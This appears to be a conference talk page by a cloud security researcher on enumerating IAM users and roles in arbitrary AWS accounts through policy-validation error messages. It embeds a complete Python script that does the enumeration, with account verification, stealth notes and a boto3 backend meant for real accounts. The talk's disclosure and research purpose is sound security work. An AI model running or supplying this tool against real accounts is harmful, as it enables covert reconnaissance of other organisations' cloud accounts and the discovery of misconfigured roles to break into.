Jay Chen

Cloud Security Researcher
Prisma Cloud and Unit 42

Title: From API Information Leakage to Pwned AWS Accounts

Abstract: In this talk, I will show a set of AWS resource policy APIs that can be abused to enumerate the existing users and roles in arbitrary AWS accounts. Using this technique, I conducted a reconnaissance study on GitHub to look for AWS accounts with misconfigured IAM policies. The research identified hundreds of thousands of EC2 snapshots and hundreds of S3 buckets that were not publicly exposed.

While AWS strives to provide more granular permissions and simplify the policy creation process, a convenient feature that validates user-created policies inadvertently leaks account-specific information in error messages: a policy that names a principal which does not exist is rejected, while one that names an existing principal is accepted. One can repeatedly invoke a policy-update API with crafted user/role names to gradually build up the target account's roster. Because the error messages are raised in the policy creator's account (the API call, and therefore its CloudTrail record, belongs to the caller), the target account cannot observe the enumeration.
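The following Python is an added illustration of the enumeration loop described above; it is example code written for this page, not the speaker's tooling. It assumes one specific member of the API family the abstract refers to, iam:UpdateAssumeRolePolicy on a role in the caller's own account, and assumes that IAM's rejection text contains "Invalid principal in policy". Testing the account's root ARN doubles as the account-verification step mentioned in the second part of the talk. The account ID, candidate names and the FakeIam roster are constructed test data so the code runs offline; the boto3 wrapper at the bottom is what you would plug in against a real account.

```python
"""Enumerate IAM users/roles in a target account via policy-validation errors.

Assumption: the policy-update API used is iam:UpdateAssumeRolePolicy on a role
the caller owns. If the trust policy names a principal ARN that does not exist,
IAM rejects it with MalformedPolicyDocument ("Invalid principal in policy");
if the principal exists, the update succeeds. Only the caller's account logs the call.
"""
import json
import re
from typing import Callable, Iterable, List

# Substring of the rejection message; the exact wording is an assumption.
INVALID_PRINCIPAL = re.compile(r"invalid principal", re.IGNORECASE)

UpdatePolicy = Callable[[str], None]  # takes a policy JSON document, raises on rejection


def trust_policy_for(principal_arn: str) -> str:
    """Build a trust policy whose only principal is principal_arn."""
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"AWS": principal_arn},
            "Action": "sts:AssumeRole",
        }],
    })


def principal_exists(update_policy: UpdatePolicy, principal_arn: str) -> bool:
    """True if IAM accepted a trust policy naming principal_arn.

    Only an "invalid principal" rejection means "does not exist"; anything else
    (throttling, AccessDenied, network errors) is re-raised so it is not misread.
    """
    try:
        update_policy(trust_policy_for(principal_arn))
        return True
    except Exception as exc:
        if INVALID_PRINCIPAL.search(str(exc)):
            return False
        raise


def account_exists(update_policy: UpdatePolicy, account_id: str) -> bool:
    """Account verification: every existing account has a :root principal."""
    return principal_exists(update_policy, f"arn:aws:iam::{account_id}:root")


def enumerate_principals(update_policy: UpdatePolicy, account_id: str,
                         candidates: Iterable[str]) -> List[str]:
    """Try each candidate name as a role and as a user; return the ARNs that exist."""
    found = []
    for name in candidates:
        for kind in ("role", "user"):
            arn = f"arn:aws:iam::{account_id}:{kind}/{name}"
            if principal_exists(update_policy, arn):
                found.append(arn)
    return found


class FakeIam:
    """Constructed stand-in for IAM: knows a roster of ARNs and mimics the error."""

    def __init__(self, existing_arns: Iterable[str]):
        self.existing = set(existing_arns)
        self.calls = 0  # number of policy updates the caller's account would log

    def update_assume_role_policy(self, document: str) -> None:
        self.calls += 1
        for stmt in json.loads(document)["Statement"]:
            if stmt["Principal"]["AWS"] not in self.existing:
                raise RuntimeError(
                    "An error occurred (MalformedPolicyDocument) when calling the "
                    "UpdateAssumeRolePolicy operation: Invalid principal in policy")


def boto3_updater(role_name: str) -> UpdatePolicy:
    """Real backend: needs credentials with iam:UpdateAssumeRolePolicy on role_name
    in the caller's own account. Not exercised offline (boto3 imported lazily)."""
    import boto3  # type: ignore
    iam = boto3.client("iam")

    def update(document: str) -> None:
        iam.update_assume_role_policy(RoleName=role_name, PolicyDocument=document)
    return update


if __name__ == "__main__":
    target = "123456789012"  # constructed account ID
    fake = FakeIam({f"arn:aws:iam::{target}:root",
                    f"arn:aws:iam::{target}:role/deploy",
                    f"arn:aws:iam::{target}:user/ci"})
    print("account exists:", account_exists(fake.update_assume_role_policy, target))
    print("found:", enumerate_principals(fake.update_assume_role_policy, target,
                                         ["Admin", "deploy", "ci"]))
    print("calls logged in the caller's account:", fake.calls)
```

Note that the candidate list is the whole game: the talk's second part obtains it by extracting role names from code on GitHub, so the loop above is only as good as that wordlist, and each guess costs one API call in the attacker's own account.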

In the second part of the research, I used this technique to scrape GitHub and find AWS accounts with misconfigured IAM roles. I went through four steps: account verification, role-name extraction, role-name enumeration, and misconfiguration identification. The reconnaissance found misconfigured accounts with thousands of workloads belonging to billion-dollar organizations.

Bio: Dr. Jay Chen is a cloud security researcher with Prisma Cloud and Unit 42. He has extensive research experience in cloud-native and DevOps security. His current research focuses on investigating the vulnerabilities, design flaws, and adversary tactics in cloud-native technologies such as containers and serverless applications. In the past, he also researched mobile cloud and distributed storage security. Jay has authored 20+ academic and industrial papers.